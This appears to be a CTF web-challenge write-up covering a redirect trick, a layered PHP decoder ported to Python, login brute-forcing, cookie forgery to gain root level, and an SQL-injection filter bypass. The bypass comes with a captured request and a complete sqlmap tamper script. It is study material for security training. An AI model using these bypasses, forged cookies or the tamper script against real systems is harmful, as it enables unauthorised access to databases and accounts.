web:
be careful:
There is a redirect: the PHP page redirects to an HTML page, but the flag is in the PHP page's response. Burp Suite (BP) is the tool for this: intercept the request and read the PHP response body before the browser follows the redirect.
decode:
The decryption script is as follows:
function decode($str){
    // Undo the outer layers: rot13, then reverse, then base64
    $_ = base64_decode(strrev(str_rot13($str)));
    $_o = '';
    // Shift every byte down by one
    for($_0 = 0; $_0 < strlen($_); $_0++){
        $_c = substr($_, $_0, 1);
        $__ = ord($_c) - 1;
        $_c = chr($__);
        $_o = $_o . $_c;
    }
    // The plaintext was stored reversed, so reverse it back
    return strrev($_o);
}
Decrypting the given string yields the flag.
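As an added example (not part of the original writeup), here is the same decode() ported to Python together with its inverse, so the obfuscation can be checked as a round trip: encode() applies the steps in the opposite order (reverse the plaintext, shift each byte up by one, base64-encode, reverse, rot13) and decode() undoes them exactly as the PHP does. The sample string is constructed here and is not a challenge value.

```python
import base64
import codecs


def decode(s: str) -> str:
    """Python port of the challenge's PHP decode(): str_rot13 -> strrev ->
    base64_decode, then chr(ord(c) - 1) on every byte and a final strrev."""
    raw = base64.b64decode(codecs.decode(s, "rot13")[::-1])
    # PHP chr() wraps modulo 256, so 0x00 - 1 becomes 0xFF; mirror that.
    shifted = bytes((b - 1) % 256 for b in raw)
    return shifted[::-1].decode("latin-1")


def encode(plaintext: str) -> str:
    """Inverse of decode() (added here; the page only shows the decoder):
    undo each step in the opposite order."""
    shifted = bytes((b + 1) % 256 for b in plaintext.encode("latin-1")[::-1])
    b64 = base64.b64encode(shifted).decode("ascii")
    return codecs.encode(b64[::-1], "rot13")


def roundtrip_ok(plaintext: str) -> bool:
    """True when decode(encode(x)) reproduces x."""
    return decode(encode(plaintext)) == plaintext


if __name__ == "__main__":
    sample = "flag{constructed_sample}"  # constructed, not a challenge flag
    print(encode(sample))
    print(decode(encode(sample)))
```

Because rot13 leaves digits, `+`, `/` and `=` untouched and only rotates letters, a rot13'd base64 string still looks like base64; the reversed padding (`==` at the front) is the giveaway when you meet this scheme in the wild.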
Brute force:
There is a password.txt file; use it as the wordlist and brute-force the login with Burp Intruder. The hit is nsF0cuS. After logging in, the page says the flag is not here. Look at the cookie: base64-decoding it leads to a new page, a message board, where you have to post as 小黑. Set the cookie value islogin to 1 and the poster's level userlevel to root; the post then succeeds and yields the flag.
javascript:
The challenge hint says the focus is JS. Viewing the source reveals check.js; analysing it gives G0od!JAVA3C41PTISAGO 1pt_Pa4sW0rd_K3y_H3re //~~~. Entering these gives a new address, 06/Ch3ck_Au7h.php, which returns error however it is opened. From the filename it is presumably an authentication script that checks a username and password, so pass them as GET parameters: uname=G0od!JAVA3C41PTISAGO upass=1pt_Pa4sW0rd_K3y_H3re, which yields the flag.
sqli:
There is a filtername parameter. Initial analysis shows it controls what gets filtered out of the submitted username: whatever you put in filtername is what gets removed. Sending ' gets escaped; %27 is still escaped; %25%27 (a double URL-encoded quote) gets through. Sending a space triggers a "SQL injection" warning, and replacing the space with /*xx*/ still triggers it. So use filtername to rebuild the comment: put /ww*xxx*ww/ in username and ww in filtername (as in the captured request below). The check never sees /* in the raw input, and once the filter strips the ww what is left is /*xxx*/, so the check is bypassed.
The request is:
POST /fa81bb665474f11c025b5355582af315/web/12/index.php HTTP/1.1
Host: www.nsctf.net:8000
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.nsctf.net:8000
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36
Referer: http://www.nsctf.net:8000/fa81bb665474f11c025b5355582af315/web/12/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 110

username=admi%&filtername=ww&Submit=%e6%8f%90%e4%ba%a4
To run sqlmap through this filter, its space2comment tamper script needs to be adapted:
The code is as follows:
#!/usr/bin/env python
"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW
def dependencies():
pass
def tamper(payload, **kwargs):
"""
Replaces space character (' &
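The original script is cut off above, so as an added example (not the writeup's own script and not sqlmap's space2comment.py) here is a complete space2comment variant for this filter, together with an offline model of the server-side handling the writeup describes, so the two can be checked against each other without the target. Assumptions not stated on the page: the marker is "ww" (the filtername value in the captured request); the server first rejects raw input containing a space or "/*", then removes the filtername string from username with a plain string replace, and only then builds the query. Quote escaping is not modelled.

```python
"""
Added example, not the original writeup's script and not sqlmap's own
space2comment.py: a space2comment variant that hides the comment delimiters
behind a marker the target strips, plus a model of that filter.

Assumptions (not stated on the page): marker "ww" from the captured request;
server order = naive check on raw input -> strip filtername -> build query.
"""
try:
    from lib.core.enums import PRIORITY  # present when loaded by sqlmap
    __priority__ = PRIORITY.LOW
except ImportError:  # stand-alone run outside the sqlmap tree
    __priority__ = 0

MARKER = "ww"
# "/ww**ww/" in the raw input, "/**/" once the server removes "ww"
COMMENT = "/%s**%s/" % (MARKER, MARKER)


def dependencies():
    pass


def tamper(payload, **kwargs):
    """Replace each space outside quoted strings with /ww**ww/.

    Same character walk as sqlmap's space2comment: after the first space,
    quote state is tracked so spaces inside '...' or "..." are left alone.
    """
    if not payload:
        return payload
    retVal = ""
    quote = doublequote = firstspace = False
    for ch in payload:
        if not firstspace:
            if ch.isspace():
                firstspace = True
                retVal += COMMENT
                continue
        elif ch == "'":
            quote = not quote
        elif ch == '"':
            doublequote = not doublequote
        elif ch == " " and not doublequote and not quote:
            retVal += COMMENT
            continue
        retVal += ch
    return retVal


def server_side(username, filtername):
    """Model of the challenge's handling as the writeup describes it (assumed).

    Returns None when the naive check fires (the page's 'SQL injection'
    message), otherwise the string that would reach the query.
    """
    if " " in username or "/*" in username:
        return None
    return username.replace(filtername, "")


if __name__ == "__main__":
    probe = "admin' or 1=1#"  # constructed probe, not a value from the page
    print(server_side(probe, MARKER))          # None: the space is caught
    print(server_side(tamper(probe), MARKER))  # admin'/**/or/**/1=1#
```

Drop the file into sqlmap's tamper/ directory and pass it with --tamper together with the fixed POST body containing filtername=ww; the model above is only for checking the transformation offline.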